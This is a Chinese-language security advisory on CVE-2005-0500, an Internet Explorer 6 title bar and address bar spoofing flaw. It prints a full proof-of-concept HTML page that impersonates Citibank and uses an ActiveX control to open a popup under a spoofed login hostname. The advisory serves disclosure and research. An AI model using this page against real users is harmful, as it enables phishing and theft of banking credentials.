Microsoft Internet Explorer 弹出窗口标题栏欺骗漏洞
发布日期:2005-02-21
更新日期:2005-02-21
受影响系统:Microsoft Internet Explorer 6.x
描述:
BUGTRAQ ID:
12602
CVE(CAN) ID:
CVE-2005-0500
Windows Internet Explorer,简称MSIE,是微软公司推出的一款网页浏览器。
Windows XP SP2遇到没有地址栏的弹出窗口时,会强制窗口URL显示在地址栏,在实现上存在地址栏欺骗漏洞。通过超长的主机名可进行标题栏欺骗,执行网络钓鱼攻击。
<*来源:bitlance winter (
bitlance_3@hotmail.com)
链接:
http://secunia.com/advisories/14335
http://xforce.iss.net/xforce/xfdb/19452
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<!-- saved from url=(0014)about:internet -->
<html lang="x-klingon">
<head>
<title>Welcome to Citibank</title>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<meta http-equiv="Content-Script-Type" content="text/javascript">
<script type="text/javascript">
<!-- Begin
function shellscript()
{
window.focus();
pURL = '
http://securelogin.citibank.com"+".e-gold.com/';
sP = 'toolbar=0,scrollbars=0,location=0,statusbar=0,';
sP += 'menubar=0,resizable=0,width=315,';
sP += 'height=200,left = 250,top = 200'
day = new Date();
id = day.getTime();
eval("page" + id + " = window.open(pURL, '" + id + "',sP);");
}
function main()
{
targetURL = '
http://citibank.com/us/index.htm';
x.DOM.Script.execScript(shellscript.toString());
x.DOM.Script.setTimeout("shellscript()");
location.replace(targetURL);
}
setTimeout(' main() ',1000);
// End -->
</script>
</head>
<object
id="x"
classid="clsid:2D360201-FFF5-11d1-8D03-00A0C959BC0A"
width="1"
height="1"
align="middle"
>
<param name="ActivateApplets" value="1">
<param name="ActivateActiveXControls" value="1">
</object>
</body>
</html>
建议:
厂商补丁:
Microsoft
---------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
http://www.microsoft.com/windows/ie/default.asp浏览次数:2015
严重程度:0(网友投票)
